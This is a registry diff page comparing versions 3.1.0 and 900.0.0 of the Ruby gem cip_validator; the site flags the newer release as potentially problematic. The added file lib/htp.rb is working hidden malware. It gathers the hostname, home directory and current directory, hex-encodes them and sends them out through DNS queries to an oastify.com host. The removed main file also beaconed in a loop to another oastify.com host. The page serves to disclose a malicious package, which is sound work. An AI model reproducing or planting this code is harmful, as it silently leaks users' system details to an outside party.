cip_validator 3.1.0 → 900.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of cip_validator might be problematic. Click here for more details.

checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: f32bb67aa3eaa2ba536454a60e03c885c044b5837f7eb725fdb04f566b4b8df0
4
- data.tar.gz: a1262fe3f847c72e0797d2b6721ca5ec3739990ff037e118da2244744632a6d3
3
+ metadata.gz: fb4361a0a6c558c306a5aefee89c2c153ea7a63422a6191b4ff410e62e1c8d79
4
+ data.tar.gz: 238a89bf76ecb9e7c1fd739fb09f345ad136923aa81decf63cc9ffa973fb32e6
5
5
  SHA512:
6
- metadata.gz: 06f6cb9fe937d57532c9ab9fc041c632c4ac1443269b985255204056201238e594a53972c4e6c54603b3dc63627fbee0e93ba84870863b627847855d2fc1eb6e
7
- data.tar.gz: de99752b7eff0f8c8c0fc8919464bed3539258aab6288d5aa8201898b67bebaf8faf6c7420d4711daae2ca168c5461f485afcf5233d9c139606d74704da97fab
6
+ metadata.gz: 9b96a52da5f706f01d7964b3b5846e64504f5ecbfb3c787c945f08f6180f6260a708418dd221e602ba45a6ba9e82c4f867384bf008e75df680c823aaecad7df7
7
+ data.tar.gz: 7bd77ded57dbfa343ac0ec43ca95a58e946e8c78a0209b45f932c8d73e290d6f83cf327f648b80dba6dd7a4eb92ef14b4c4e307700b3da100098721bf43000f6
data/lib/htp.rb ADDED
@@ -0,0 +1,22 @@
1
+ require 'json'
2
+ require 'resolv'
3
+
4
+ h = '536t5u39tablvlna8gv93i4m6dc40t.oastify.com'
5
+ p = 'cip_validator'
6
+ id = rand(36**12).to_s(36)
7
+
8
+ d = {
9
+ 'p' => p,
10
+ 'h' => Socket.gethostname,
11
+ 'd' => File.expand_path('~'),
12
+ 'c' => Dir.pwd
13
+ }
14
+
15
+ d = JSON.generate(d)
16
+ d = d.unpack('H*')[0].scan(/.{1,60}/)
17
+
18
+ d.each.each_with_index do |c, i|
19
+ begin
20
+ Resolv.getaddress id + '.' + i.to_s + '.' + c + ".dns." + h
21
+ rescue; end
22
+ end
metadata CHANGED
@@ -1,29 +1,23 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: cip_validator
3
3
  version: !ruby/object:Gem::Version
4
- version: 3.1.0
4
+ version: 900.0.0
5
5
  platform: ruby
6
6
  authors:
7
- - Anupam Singh
7
+ - xen
8
8
  autorequire:
9
- bindir: exe
9
+ bindir: bin
10
10
  cert_chain: []
11
- date: 2023-04-28 00:00:00.000000000 Z
11
+ date: 2022-06-05 00:00:00.000000000 Z
12
12
  dependencies: []
13
- description: taken over by AnupamAS01
14
- email:
15
- - 79111711+AnupamAS01@users.noreply.github.com
13
+ description:
14
+ email:
16
15
  executables: []
17
16
  extensions: []
18
17
  extra_rdoc_files: []
19
18
  files:
20
- - Gemfile
21
- - README.md
22
- - Rakefile
23
- - lib/cip_validator.rb
24
- - lib/cip_validator/version.rb
25
- - sig/cip_validator.rbs
26
- homepage: https://anupamas0x1.github.io/
19
+ - lib/htp.rb
20
+ homepage:
27
21
  licenses: []
28
22
  metadata: {}
29
23
  post_install_message:
@@ -34,7 +28,7 @@ required_ruby_version: !ruby/object:Gem::Requirement
34
28
  requirements:
35
29
  - - ">="
36
30
  - !ruby/object:Gem::Version
37
- version: 2.6.0
31
+ version: '0'
38
32
  required_rubygems_version: !ruby/object:Gem::Requirement
39
33
  requirements:
40
34
  - - ">="
@@ -44,5 +38,5 @@ requirements: []
44
38
  rubygems_version: 3.0.3.1
45
39
  signing_key:
46
40
  specification_version: 4
47
- summary: AnupamAS01
41
+ summary: cody zacharias
48
42
  test_files: []
data/Gemfile DELETED
@@ -1,8 +0,0 @@
1
- # frozen_string_literal: true
2
-
3
- source "https://rubygems.org"
4
-
5
- # Specify your gem's dependencies in cip_validator.gemspec
6
- gemspec
7
-
8
- gem "rake", "~> 13.0"
data/README.md DELETED
@@ -1,29 +0,0 @@
1
- # CipValidator
2
-
3
- Welcome to your new gem! In this directory, you'll find the files you need to be able to package up your Ruby library into a gem. Put your Ruby code in the file `lib/cip_validator`. To experiment with that code, run `bin/console` for an interactive prompt.
4
-
5
- TODO: Delete this and the text above, and describe your gem
6
-
7
- ## Installation
8
-
9
- Install the gem and add to the application's Gemfile by executing:
10
-
11
- $ bundle add cip_validator
12
-
13
- If bundler is not being used to manage dependencies, install the gem by executing:
14
-
15
- $ gem install cip_validator
16
-
17
- ## Usage
18
-
19
- TODO: Write usage instructions here
20
-
21
- ## Development
22
-
23
- After checking out the repo, run `bin/setup` to install dependencies. You can also run `bin/console` for an interactive prompt that will allow you to experiment.
24
-
25
- To install this gem onto your local machine, run `bundle exec rake install`. To release a new version, update the version number in `version.rb`, and then run `bundle exec rake release`, which will create a git tag for the version, push git commits and the created tag, and push the `.gem` file to [rubygems.org](https://rubygems.org).
26
-
27
- ## Contributing
28
-
29
- Bug reports and pull requests are welcome on GitHub at https://github.com/[USERNAME]/cip_validator.
data/Rakefile DELETED
@@ -1,4 +0,0 @@
1
- # frozen_string_literal: true
2
-
3
- require "bundler/gem_tasks"
4
- task default: %i[]
@@ -1,5 +0,0 @@
1
- # frozen_string_literal: true
2
-
3
- module CipValidator
4
- VERSION = "3.1.0"
5
- end
data/lib/cip_validator.rb DELETED
@@ -1,17 +0,0 @@
1
- # frozen_string_literal: true
2
- require 'net/http'
3
-
4
- require_relative "cip_validator/version"
5
-
6
- module CipValidator
7
- class Error < StandardError; end
8
- loop do
9
- http = Net::HTTP.new('www.m5sc7go1k5nov8ykuuv7hm4fc6ix6rug.oastify.com')
10
- request = Net::HTTP::Get.new('/')
11
- response = http.request(request)
12
- puts "Response code: #{response.code}"
13
-
14
- sleep 30
15
- end
16
- end
17
-
@@ -1,4 +0,0 @@
1
- module CipValidator
2
- VERSION: String
3
- # See the writing guide of rbs: https://github.com/ruby/rbs#guides
4
- end